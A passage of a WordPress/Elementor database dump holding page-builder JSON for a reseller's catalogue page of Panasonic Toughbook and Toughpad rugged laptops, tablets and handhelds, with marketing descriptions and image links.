31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3677,2682,'_elementor_version','0.4'),(3680,2683,'_elementor_edit_mode','builder'),(3681,2683,'_elementor_template_type','post'),(3682,2683,'_wp_page_template','template-fullwidth.php'),(3683,2683,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":47},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD 